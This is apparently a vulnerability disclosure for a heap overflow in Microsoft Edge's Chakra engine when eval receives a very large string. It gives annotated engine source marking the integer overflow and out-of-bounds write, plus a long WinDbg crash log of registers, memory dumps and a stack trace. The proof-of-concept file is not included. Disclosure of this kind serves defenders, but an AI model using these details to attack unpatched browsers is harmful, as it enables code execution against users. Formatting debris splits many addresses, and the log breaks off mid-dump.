1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 |
<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team There is a classic heap overflow when eval a string which large enough in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. An exception will occur immediatly when opening POC.html in Edge. //ChakraCore-master\lib\Runtime\Library\GlobalObject.cpp ScriptFunction* GlobalObject::DefaultEvalHelper(ScriptContext* scriptContext, const char16 *source, int sourceLength, ModuleID moduleID, uint32 grfscr, LPCOLESTR pszTitle, BOOL registerDocument, BOOL isIndirect, BOOL strictMode) { Assert(sourceLength >= 0); AnalysisAssert(scriptContext); if (scriptContext->GetThreadContext()->EvalDisabled()) { throw Js::EvalDisabledException(); } #ifdef PROFILE_EXEC scriptContext->ProfileBegin(Js::EvalCompilePhase); #endif void * frameAddr = nullptr; GET_CURRENT_FRAME_ID(frameAddr); HRESULT hr = S_OK; HRESULT hrParser = S_OK; HRESULT hrCodeGen = S_OK; CompileScriptException se; Js::ParseableFunctionInfo * funcBody = NULL; BEGIN_LEAVE_SCRIPT_INTERNAL(scriptContext); BEGIN_TRANSLATE_EXCEPTION_TO_HRESULT { uint cchSource = sourceLength; size_t cbUtf8Buffer = (cchSource + 1) * 3; //OVERFLOW when cchSource large enough!!! ArenaAllocator tempArena(_u("EvalHelperArena"), scriptContext->GetThreadContext()->GetPageAllocator(), Js::Throw::OutOfMemory); LPUTF8 utf8Source = AnewArray(&tempArena, utf8char_t, cbUtf8Buffer); //Allocate memory on Arena heap with a incorrect but smaller size Assert(cchSource < MAXLONG); size_t cbSource = utf8::EncodeIntoAndNullTerminate(utf8Source, source, static_cast< charcount_t >(cchSource)); //OOB write HERE!!! Assert(cbSource + 1 <= cbUtf8Buffer); SRCINFO const * pSrcInfo = scriptContext->GetModuleSrcInfo(moduleID); [...] LEAVE_PINNED_SCOPE(); } END_TRANSLATE_EXCEPTION_TO_HRESULT(hr); END_LEAVE_SCRIPT_INTERNAL(scriptContext); #ifdef PROFILE_EXEC scriptContext->ProfileEnd(Js::EvalCompilePhase); #endif THROW_KNOWN_HRESULT_EXCEPTIONS(hr, scriptContext); if (!SUCCEEDED(hrParser)) { JavascriptError::ThrowParserError(scriptContext, hrParser, &se); } else if (!SUCCEEDED(hrCodeGen)) { [...] } else { [...] ScriptFunction* pfuncScript = funcBody->IsCoroutine() ? scriptContext->GetLibrary()->CreateGeneratorVirtualScriptFunction(funcBody) : scriptContext->GetLibrary()->CreateScriptFunction(funcBody); return pfuncScript; } } //ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp __range(0, cch * 3) size_t EncodeIntoAndNullTerminate(__out_ecount(cch * 3 + 1) utf8char_t *buffer, __in_ecount(cch) const char16 *source, charcount_t cch) { size_t result = EncodeInto(buffer, source, cch); buffer[result] = 0; return result; } //ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp __range(0, cch * 3) size_t EncodeInto(__out_ecount(cch * 3) LPUTF8 buffer, __in_ecount(cch) const char16 *source, charcount_t cch) { return EncodeIntoImpl<true>(buffer, source, cch); } //ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp template <bool cesu8Encoding> __range(0, cchIn * 3) size_t EncodeIntoImpl(__out_ecount(cchIn * 3) LPUTF8 buffer, __in_ecount(cchIn) const char16 *source, charcount_t cchIn) { charcount_t cch = cchIn; // SAL analysis gets confused by EncodeTrueUtf8's dest buffer requirement unless we alias cchIn with a local LPUTF8 dest = buffer; if (!ShouldFastPath(dest, source)) goto LSlowPath; LFastPath: while (cch >= 4) { uint32 first = ((const uint32 *)source)[0]; if ( (first & 0xFF80FF80) != 0) goto LSlowPath; uint32 second = ((const uint32 *)source)[1]; if ( (second & 0xFF80FF80) != 0) goto LSlowPath; *(uint32 *)dest = (first & 0x0000007F) | ((first & 0x007F0000) >> 8) | ((second & 0x0000007f) << 16) | ((second & 0x007F0000) << 8); //OOB write HERE finally!!! dest += 4; source += 4; cch -= 4; } LSlowPath: if (cesu8Encoding) { [...] } else { [...] } return dest - buffer; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6<code>26db0000 00007ff6</code>26dd5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffc<code>fc060000 00007ffc</code>fc23b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffc<code>fb9d0000 00007ffc</code>fba7e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffc<code>f90a0000 00007ffc</code>f92e9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffc<code>f6b90000 00007ffc</code>f6c0e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffc<code>fbbb0000 00007ffc</code>fbea9000 C:\Windows\System32\combase.dll ModLoad: 00007ffc<code>f94c0000 00007ffc</code>f95b6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffc<code>fba80000 00007ffc</code>fbba5000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffc<code>f8620000 00007ffc</code>f868a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffc<code>fbfc0000 00007ffc</code>fc05d000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffc<code>ebd60000 00007ffc</code>ebdc0000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffc<code>fac50000 00007ffc</code>fad10000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffc<code>f8580000 00007ffc</code>f861a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffc<code>f8560000 00007ffc</code>f8571000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffc<code>dae30000 00007ffc</code>db1f4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffc<code>f86f0000 00007ffc</code>f8de2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffc<code>f95c0000 00007ffc</code>f9661000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffc<code>faf10000 00007ffc</code>faf69000 C:\Windows\System32\sechost.dll ModLoad: 00007ffc<code>f97b0000 00007ffc</code>f9801000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffc<code>fb9a0000 00007ffc</code>fb9c7000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffc<code>f8e40000 00007ffc</code>f8fc8000 C:\Windows\System32\gdi32full.dll ModLoad: 00007ffc<code>fadc0000 00007ffc</code>faf0a000 C:\Windows\System32\USER32.dll ModLoad: 00007ffc<code>f8fd0000 00007ffc</code>f8fee000 C:\Windows\System32\win32u.dll ModLoad: 00007ffc<code>fad10000 00007ffc</code>fadba000 C:\Windows\System32\shcore.dll ModLoad: 00007ffc<code>f84d0000 00007ffc</code>f851c000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffc<code>f8520000 00007ffc</code>f8535000 C:\Windows\System32\profapi.dll ModLoad: 00007ffc<code>eff10000 00007ffc</code>f0196000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffc<code>f8400000 00007ffc</code>f8429000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffc<code>f3a60000 00007ffc</code>f3a86000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffc<code>f77d0000 00007ffc</code>f7801000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffc<code>f7f20000 00007ffc</code>f7f37000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffc<code>f7b60000 00007ffc</code>f7c04000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffc<code>faf70000 00007ffc</code>fafdc000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffc<code>f9710000 00007ffc</code>f9718000 C:\Windows\System32\NSI.dll ModLoad: 00007ffc<code>f9780000 00007ffc</code>f97ad000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffc<code>f7b20000 00007ffc</code>f7b57000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffc<code>f6dc0000 00007ffc</code>f6f30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffc<code>f83a0000 00007ffc</code>f83c5000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffc<code>f7600000 00007ffc</code>f7621000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffc<code>e85e0000 00007ffc</code>e8654000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffc<code>f4060000 00007ffc</code>f4082000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffc<code>efdc0000 00007ffc</code>efddb000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffc<code>fb410000 00007ffc</code>fb555000 C:\Windows\System32\ole32.dll ModLoad: 00007ffc<code>f6cf0000 00007ffc</code>f6d85000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffc<code>e7140000 00007ffc</code>e71e1000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffc<code>dc6c0000 00007ffc</code>ddd71000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffc<code>f0b20000 00007ffc</code>f0b5f000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 00007ffc<code>f5120000 00007ffc</code>f5259000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffc<code>dbb80000 00007ffc</code>dc36b000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffc<code>f5640000 00007ffc</code>f56b6000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffc<code>f55a0000 00007ffc</code>f562f000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffc<code>f41e0000 00007ffc</code>f4376000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffc<code>e6230000 00007ffc</code>e62fb000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffc<code>eb8e0000 00007ffc</code>eb9e6000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffc<code>eb570000 00007ffc</code>eb5f2000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffc<code>f65d0000 00007ffc</code>f66b3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffc<code>eb600000 00007ffc</code>eb8d2000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffc<code>f1ec0000 00007ffc</code>f1ed5000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffc<code>ee290000 00007ffc</code>ee7c1000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffc<code>f9810000 00007ffc</code>fac47000 C:\Windows\System32\shell32.dll ModLoad: 00007ffc<code>f8df0000 00007ffc</code>f8e39000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffc<code>ec070000 00007ffc</code>ec09a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffc<code>e8d00000 00007ffc</code>e902e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffc<code>f83d0000 00007ffc</code>f8400000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffc<code>fb020000 00007ffc</code>fb186000 C:\Windows\System32\msctf.dll ModLoad: 00007ffc<code>eea60000 00007ffc</code>eeb62000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffc<code>e4cf0000 00007ffc</code>e4d00000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffc<code>ebcc0000 00007ffc</code>ebd29000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffc<code>e9920000 00007ffc</code>e993b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffc<code>f28b0000 00007ffc</code>f2987000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffc<code>f7d80000 00007ffc</code>f7ddc000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffc<code>f3c20000 00007ffc</code>f3c2b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffc<code>f01f0000 00007ffc</code>f03b8000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffc<code>f8390000 00007ffc</code>f839b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffc<code>e5180000 00007ffc</code>e519a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffc<code>e2c80000 00007ffc</code>e2e0a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffc<code>f5820000 00007ffc</code>f583d000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffc<code>e3e70000 00007ffc</code>e3e88000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffc<code>e24c0000 00007ffc</code>e2507000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffc<code>f5cf0000 00007ffc</code>f5fcf000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffc<code>f66c0000 00007ffc</code>f67e2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffc<code>f7340000 00007ffc</code>f73e4000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffc<code>ed850000 00007ffc</code>ed8d2000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffc<code>df920000 00007ffc</code>df99a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffc<code>dc620000 00007ffc</code>dc648000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffc<code>f92f0000 00007ffc</code>f94b9000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffc<code>f8540000 00007ffc</code>f8551000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffc<code>deaf0000 00007ffc</code>deb4a000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffc<code>f3ba0000 00007ffc</code>f3bfd000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffc<code>f6020000 00007ffc</code>f65c4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffc<code>e9a00000 00007ffc</code>e9cbf000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffc<code>dc5e0000 00007ffc</code>dc5ef000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffc<code>eb400000 00007ffc</code>eb442000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffc<code>eb390000 00007ffc</code>eb3f7000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffc<code>f3150000 00007ffc</code>f31bb000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffc<code>dc5d0000 00007ffc</code>dc5e0000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffc<code>e9970000 00007ffc</code>e99f8000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffc<code>db710000 00007ffc</code>db724000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffc<code>dc590000 00007ffc</code>dc5c8000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffc<code>e9780000 00007ffc</code>e9908000 C:\Windows\SYSTEM32\windows.globalization.dll (2004.11d0): Access violation - code c0000005 (!!! second chance !!!) chakra!utf8::EncodeIntoImpl<1>+0xb5: 00007ffc<code>dbdb69e5 418910mov dword ptr [r8],edx ds:0000023d</code>22d81000=???????? 0:016> r rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100 rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000 rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60 r8=0000023d22d81000r9=0000023d330e4fc8 r10=000000005555462c r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=000000bb058fbd00 iopl=0 nv up ei pl nz na pe nc cs=0033ss=002bds=002bes=002bfs=0053gs=002b efl=00010200 chakra!utf8::EncodeIntoImpl<1>+0xb5: 00007ffc<code>dbdb69e5 418910mov dword ptr [r8],edx ds:0000023d</code>22d81000=???????? 0:016> !address r8 *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\SYSTEM32\vm3dum64.dll - *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\System32\ole32.dll - Usage:<unclassified> Allocation Base:0000023d<code>22d80000 Base Address: 0000023d</code>22d81000 End Address:0000023d<code>22d85000 Region Size:00000000</code>00004000 Type: 00020000 MEM_PRIVATE State:00002000 MEM_RESERVE Protect:00000000 0:016> !address r8-1 Usage:<unclassified> Allocation Base:0000023d<code>22d80000 Base Address: 0000023d</code>22d80000 End Address:0000023d<code>22d81000 Region Size:00000000</code>00001000 Type: 00020000 MEM_PRIVATE State:00001000 MEM_COMMIT Protect:00000004 PAGE_READWRITE 0:016> db 23d<code>22d80000 0000023d</code>22d8000001 00 00 00 00 00 00 00-80 77 93 1f 3d 02 00 00.........w..=... 0000023d<code>22d8001000 00 00 00 00 00 00 00-d0 0f 00 00 00 00 00 00................ 0000023d</code>22d8002000 00 d8 22 3d 02 00 00-00 00 00 00 00 00 00 00..."=........... 0000023d<code>22d8003061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d8004061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d8005061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d8006061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d8007061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0:016> kb RetAddr : Args to Child : Call Site 00007ffc</code>dbbf2611 : 0000023d<code>22d80030 0000023d</code>330e3020 00000000<code>55555600 00000235</code>00000004 : chakra!utf8::EncodeIntoImpl<1>+0xb5 00007ffc<code>dbb98201 : 0000023d</code>1f937b60 0000023d<code>330e3020 0000023d</code>55555600 000000bb<code>00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x171 00007ffc</code>dbb97fb8 : 0000023d<code>22de0000 00007ffc</code>dc2c9f80 0000023d<code>00000000 0000023d</code>22ddc000 : chakra!Js::GlobalObject::VEval+0x231 00007ffc<code>dbb97ecd : 000000bb</code>058fbd40 0000023d<code>22ddb5c0 0000023d</code>1f934ba0 000000bb<code>058fbd00 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8 00007ffc</code>dbdf6be3 : 0000023d<code>22ddb5c0 00000000</code>18000003 0000023d<code>22df0020 0000023d</code>22df9460 : chakra!Js::GlobalObject::EntryEval+0x7d 00007ffc<code>dbce6bf3 : 0000023d</code>1f934ba0 00000000<code>00000018 000000bb</code>058fbde8 0000023d<code>22ddc000 : chakra!amd64_CallFunction+0x93 00007ffc</code>dbba71ac : 0000023d<code>22ddb5c0 00007ffc</code>dbb97e50 000000bb<code>058fbe10 000000bb</code>058fbfa0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ffc<code>dbba77b4 : 000000bb</code>058fbfa0 0000023d<code>22ecc053 0000023d</code>22ddb5c0 00007ffc<code>00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114 00007ffc</code>dbc84920 : 000000bb<code>058fbfa0 0000023d</code>22ecc053 0000023d<code>058fbfa0 0000023d</code>22ecc061 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c 00007ffc<code>dbc7ff2c : 000000bb</code>058fbfa0 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250 00007ffc</code>dbd180cc : 000000bb<code>058fbfa0 0000023d</code>33040000 000000bb<code>058fc150 00000000</code>00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c 00007ffc<code>dbd17be1 : 0000023d</code>22e00420 000000bb<code>058fc330 0000023d</code>33060fc2 000000bb<code>058fc348 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 0000023d</code>33060fc2 : 000000bb<code>058fc380 00000000</code>00000000 00000000<code>00000000 00007ffc</code>dbdf6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51 00007ffc<code>dbdf6be3 : 0000023d</code>22e00420 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : 0x23d</code>33060fc2 00007ffc<code>dbce6bf3 : 0000023d</code>1f934ba0 00000000<code>00000000 0000023d</code>1f940c90 00007ffc<code>dbcfa837 : chakra!amd64_CallFunction+0x93 00007ffc</code>dbd11810 : 0000023d<code>22e00420 00007ffc</code>dbdf6df0 000000bb<code>058fc480 0000023d</code>1f937b60 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ffc<code>dbd10a37 : 0000023d</code>22e00420 000000bb<code>058fc570 0000023d</code>1f937b60 00007ffc<code>fc027100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100 00007ffc</code>dbdd907e : 0000023d<code>22e00420 000000bb</code>058fc5d0 0000023d<code>1f937b60 0000023d</code>1f943000 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b 00007ffc<code>dbd3cd54 : 0000023d</code>22e00420 000000bb<code>058fc610 00000000</code>00000000 000000bb<code>058fc628 : chakra!ScriptSite::CallRootFunction+0x6a 00007ffc</code>dbcd1b49 : 0000023d<code>1f937a50 0000023d</code>22e00420 000000bb<code>058fc6c0 00000000</code>00000000 : chakra!ScriptSite::Execute+0x124 00007ffc<code>dbcd2e8e : 0000023d</code>1f934750 000000bb<code>058fcbc8 000000bb</code>058fcc00 000000bb<code>80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5 00007ffc</code>dbcd3121 : 0000023d<code>1f934750 0000023d</code>2101f5c4 00000000<code>00000000 00000235</code>1f594330 : chakra!ScriptEngine::ParseScriptTextCore+0x436 00007ffc<code>dcac3c75 : 0000023d</code>1f9347a0 0000023d<code>2101f5c4 00000235</code>00000042 00000000<code>00000000 : chakra!ScriptEngine::ParseScriptText+0xb1 00007ffc</code>dcac3abe : 00000000<code>00000000 000000bb</code>058fca99 00000235<code>1f594260 00000235</code>00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119 00007ffc<code>dcac35d7 : 00000000</code>00000000 00000235<code>1f594260 00000235</code>1f51c1c0 00000235<code>1f5941b0 : edgehtml!CScriptCollection::ParseScriptText+0x202 00007ffc</code>dcac2f07 : 00000235<code>1f530c01 00000235</code>1f58c100 00000235<code>00000082 00007ffc</code>00000000 : edgehtml!CScriptData::CommitCode+0x357 00007ffc<code>dcb82f8d : 00000000</code>ffffffff 00000235<code>1f51c460 00000000</code>ffffffff 00000000<code>00000000 : edgehtml!CScriptData::Execute+0x20f 00007ffc</code>dc9c43d4 : 00000000<code>00000000 00000235</code>1f56c440 00000000<code>00000001 00007ffc</code>dcb7ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d 00007ffc<code>dc9c34a1 : 00000235</code>1f530c00 00000000<code>00000000 00000235</code>1f530c00 00000235<code>1f50c8c0 : edgehtml!CHtmParseBase::Execute+0x204 00007ffc</code>dcb7d23b : 00000000<code>04cd60c0 00000235</code>1f500000 00000235<code>1f5600b0 00000235</code>1f50c8c0 : edgehtml!CHtmPost::Exec+0x1e1 00007ffc<code>dcb7d11f : 00000235</code>1f50c8c0 00000000<code>04cd60c0 0000023d</code>203725a0 00000000<code>00000000 : edgehtml!CHtmPost::Run+0x2f 00007ffc</code>dcb7cfd3 : 00000235<code>1f500000 00000012</code>c245be01 00000000<code>00000002 00000235</code>1f541680 : edgehtml!PostManExecute+0x63 00007ffc<code>dcb7ce6d : 00000235</code>1f50c8c0 00000012<code>c245be61 0000023d</code>00000000 00007ffc<code>eff34779 : edgehtml!PostManResume+0xa3 00007ffc</code>dcb8b353 : 00000235<code>1f528600 0000023d</code>20350350 00000000<code>00000000 00000000</code>00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d 00007ffc<code>dcb650db : 00000235</code>1f5082d0 0000023d<code>1f927e73 0000023d</code>1f902200 000000bb<code>058fd150 : edgehtml!CDwnChan::OnMethodCall+0x23 00007ffc</code>dc9f1706 : 0000023d<code>1f902728 00000235</code>1f541680 0000023d<code>1f902260 000000bb</code>058fd180 : edgehtml!GWndAsyncTask::Run+0x1b 00007ffc<code>dcb3a860 : 0000002b</code>dd92f8c0 00000235<code>1f5416e0 00000235</code>1f5600b0 00007ffc<code>dca99138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236 00007ffc</code>dcb3a683 : 0000023d<code>20350350 00000000</code>00000000 00000000<code>00000002 00000235</code>1f508170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70 00007ffc<code>dc9f22b3 : 000000bb</code>058fd630 00000000<code>00008002 00000235</code>1f508170 00007ffc<code>fade47df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3 00007ffc</code>dc9f07a5 : 00000000<code>00008002 00000235</code>1f500000 0000d687<code>35232df0 00000000</code>00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53 00007ffc<code>fadcbc50 : 00000000</code>001b029a 00000000<code>00000001 00000000</code>00000002 00000000<code>80000012 : edgehtml!GlobalWndProc+0x125 00007ffc</code>fadcb5cf : 00000235<code>1de0b5c0 00007ffc</code>dc9f0680 00000000<code>001b029a 00000000</code>001b029a : USER32!UserCallWinProcCheckWow+0x280 00007ffc<code>dae36d0e : 000000bb</code>058fd5d0 00000000<code>00000000 0000023d</code>2030b260 00000000<code>00000000 : USER32!DispatchMessageWorker+0x19f 00007ffc</code>dae4eecb : 00000000<code>00000000 00000000</code>00000001 00000235<code>1d929e40 00000235</code>1d8d4af0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee 00007ffc<code>e85eb4a8 : 00000000</code>00000000 00000235<code>1d928f50 00000000</code>00000000 00000000<code>00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab 00007ffc</code>fb9e2774 : 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48 00007ffc<code>fc0d0d61 : 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000000</code>00000000 : 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 : ntdll!RtlUserThreadStart+0x21 0:016> db r8 l-100 0000023d<code>22d80f0061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80f1061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80f2061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80f3061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80f4061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80f5061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80f6061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80f7061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80f8061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80f9061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80fa061 61 61 61 61 61 61 61-61 61 61 61 61 